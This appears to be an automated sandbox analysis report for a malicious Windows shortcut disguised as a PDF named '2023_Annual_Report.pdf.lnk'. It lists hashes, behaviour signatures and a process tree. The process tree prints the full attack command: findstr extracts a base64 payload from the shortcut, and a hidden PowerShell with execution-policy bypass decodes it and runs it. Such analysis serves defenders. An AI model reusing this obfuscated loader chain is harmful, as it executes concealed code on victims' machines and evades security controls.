Analysis
-
max time kernel
1215s -
max time network
1219s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-12-2023 21:43
Static task
static1
Behavioral task
behavioral1
Sample
2023_Annual_Report.pdf.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2023_Annual_Report.pdf.lnk
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
2023_Annual_Report.pdf.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
2023_Annual_Report.pdf.lnk
Resource
win11-20231215-en
General
-
Target
2023_Annual_Report.pdf.lnk
-
Size
55KB
-
MD5
bbc4414d76d1a765f3d525556f616ef9
-
SHA1
c73e28d87fbbc8be79ed1d421e78a41c29111a86
-
SHA256
86f504dea07fd952253904c468d83d9014a290e1ff5f2d103059638e07d14b09
-
SHA512
2a7204e361ace1c5c03bc240b985d09cc1f1e67dce025dca5ac9d450bc7193e456d3602ab557abd9bd7ec4d96815e41df06cdce9359379b32c0e777aa9d54be7
-
SSDEEP
768:NLoFJQeDHeGYyhA5Z7JsCVResXebqwVCYm7/k/m7RU6d/dwiuGIjsZL2RxcNRyxc:NLBWYX5Z7JsCVCbqECB7cOm0OoxUURV
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3036 powershell.exe 2584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2340 wrote to memory of 2816 2340 cmd.exe 29 PID 2340 wrote to memory of 2816 2340 cmd.exe 29 PID 2340 wrote to memory of 2816 2340 cmd.exe 29 PID 2816 wrote to memory of 2256 2816 cmd.exe 30 PID 2816 wrote to memory of 2256 2816 cmd.exe 30 PID 2816 wrote to memory of 2256 2816 cmd.exe 30 PID 2816 wrote to memory of 3036 2816 cmd.exe 31 PID 2816 wrote to memory of 3036 2816 cmd.exe 31 PID 2816 wrote to memory of 3036 2816 cmd.exe 31 PID 3036 wrote to memory of 2584 3036 powershell.exe 32 PID 3036 wrote to memory of 2584 3036 powershell.exe 32 PID 3036 wrote to memory of 2584 3036 powershell.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\2023_Annual_Report.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "C:\Users\Admin\AppData\Local\Temp\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"2⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\findstr.exefindstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk3⤵PID:2256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD550514f94115e319477095fbefa61257e
SHA1004b3b8e4ace16db6fc954c10decf8856617ef12
SHA2564339e02a2557b36934baf68b6e97daae04a3e118da2a66915e6200579594d8c6
SHA51247f6a6f52e02cb7365e70e1637ad0f6e4c96c6f156ad794f3583eb8cbf1dc9af3b8a921ca2c754c2636bba2c2c6991204930502d171b2b41b72af78bfb7e2a49
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e282182c508d95b13bd9cc6fdd0a9ae0
SHA1103262f3e49cdd4ddc49dcbb9487a7708bb1ca6c
SHA25687e3b8dac0ebd421f8358a2b5204577e80e96d53fb1335e6d563a6959e811a2e
SHA5124ec75bec57e782de93eac2c41f1314676ed0b523b2632549867081f7d68f9f5cd36ebb7c8f041e34f8256173d444c8ba9d38283176b362950344366fe05ca8a2